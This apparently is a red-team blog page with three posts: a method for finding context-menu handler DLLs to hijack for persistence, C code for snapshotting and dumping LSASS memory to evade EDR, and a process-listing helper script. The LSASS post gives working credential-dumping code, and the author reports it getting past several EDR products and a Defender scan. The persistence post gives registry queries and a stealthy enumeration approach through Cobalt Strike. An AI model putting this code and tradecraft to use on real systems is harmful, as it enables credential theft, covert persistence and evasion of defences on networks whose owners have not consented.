Context Menu Handler Persistence Searcher

I recently came across an awesome method of persistence that takes advantage of context menu handlers by using DLL hijacking. The article by Raphael Karger gives a great overview with screenshots and proof-of-concept code. Definitely read through his article as this post is directly related.

As I was re-creating this technique, I was thinking through how I would execute this from a Cobalt Strike beacon entirely on a red team. The piece that stuck out to me was using AutoRun from SysInternals to find the DLL that handles the context menu. After understanding the process I decided to find an easier way to do this.

The first option is using reg query to find the correct DLL. The following command will display all of the programs that have context menu handlers and their corresponding CLSID.

reg query HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers /s

After finding the target program’s CLSID, you need to perform another registry query to locate the correct DLL. In this case, I am targeting 7-zip. As a result, the default value will return with the correct DLL. In this case, 7-zip.dll.

reg query HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32

Thinking through this scenario, this isn’t a bad option. However, the reg command can be viewed as an IOC, especially if it is correlated with other potentially malicious activity. I decided to write a quick C# program that would enumerate all of this information for you by using the Registry Class. I ended up with a tool that will provide all of the same information and will not need to touch disk as it can be executed through beacon’s execute-assembly functionality.

There you have it; the DLLs that can be targeted for this method of persistence without any command line indicators. The code can be found on my github at https://github.com/BoredSecGuy/Scripts/blob/master/ContextMenuFinder.cs

Snapshot LSASS to evade EDR

As detection tools are beginning to detect the MiniDumpWriteDump function of the running LSASS process, the community is looking for ways of avoiding touching running LSASS.

Enter PssCaptureSnapshot

I’ve seen this technique posted around different places that will take a snapshot of the LSASS process, get a handle to that snapshot, then use the MiniDumpWriteDump function on the snapshot of LSASS. I have used this technique successfully against multiple EDR tools. This method can also be done through procdump with -r.

However, procdump is commonly detected by command-line indicators like -ma lsass and -accepteuala, which would still be required for this to run. After obtaining a handle to LSASS, which most EDRs do not care about, you will need the following callback function and code to create the snapshot of the LSASS process.

BOOL CALLBACK MDWDCallback(
	__in     PVOID CallbackParam,
	__in     const PMINIDUMP_CALLBACK_INPUT CallbackInput,
	__inout  PMINIDUMP_CALLBACK_OUTPUT CallbackOutput
)
{
	switch (CallbackInput->CallbackType)
	{
	case 16:
		CallbackOutput->Status = S_FALSE;
		break;
	}
	return TRUE;
}
	// Get handle to lsass
	HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, processID);

	// Set arguments and callbackinfo
	HANDLE snapshotHandle = NULL;
	DWORD args = (DWORD)PSS_CAPTURE_VA_CLONE | PSS_CAPTURE_HANDLES | PSS_CAPTURE_HANDLE_NAME_INFORMATION | PSS_CAPTURE_HANDLE_BASIC_INFORMATION | PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION | PSS_CAPTURE_HANDLE_TRACE | PSS_CAPTURE_THREADS | PSS_CAPTURE_THREAD_CONTEXT | PSS_CAPTURE_THREAD_CONTEXT_EXTENDED | PSS_CREATE_BREAKAWAY | PSS_CREATE_BREAKAWAY_OPTIONAL | PSS_CREATE_USE_VM_ALLOCATIONS | PSS_CREATE_RELEASE_SECTION;
	MINIDUMP_CALLBACK_INFORMATION CallbackInfo;
	ZeroMemory(&CallbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));
	CallbackInfo.CallbackRoutine = &MDWDCallback;
	CallbackInfo.CallbackParam = NULL;

	// Capture the snapshot on lsass handle
	PssCaptureSnapshot(processHandle, (PSS_CAPTURE_FLAGS)args, CONTEXT_ALL, (HPSS*)& snapshotHandle);

    // Free the snapshot
	PssFreeSnapshot(GetCurrentProcess(), (HPSS)snapshotHandle);

Before freeing the snapshot, you’ll be able to call the MiniDumpWriteDump function on the snapshot to dump the running LSASS process memory. As a test, I ran a Windows Defender scan on the executable with no issues.

The current version I have written hardcodes the path to be output to C:\Windows\Temp\debug.dmp. I also compiled this version in Debug in Visual Studio so the command prompt remains after the executable has run. Below is the finished product.

The last note on this technique is that it only will work on specific versions of Windows and does not work on Windows 7. Below is according to Microsoft’s documentation.

https://docs.microsoft.com/en-us/windows/win32/api/processsnapshot/nf-processsnapshot-psscapturesnapshot

Tasklist Process Highlighter

I wrote a small script to identify potentially interesting services on a Windows host. I realized Cobalt Strike has aggressor scripts for this (i.e., https://github.com/harleyQu1nn/AggressorScripts/blob/master/ProcessColor.cna) and translated that to a Python script. I have been using this to save some time of parsing through tasklist output and get a good understanding of the process list quickly.

Code can be found at https://github.com/BoredSecGuy/Scripts/blob/master/processSearcher.py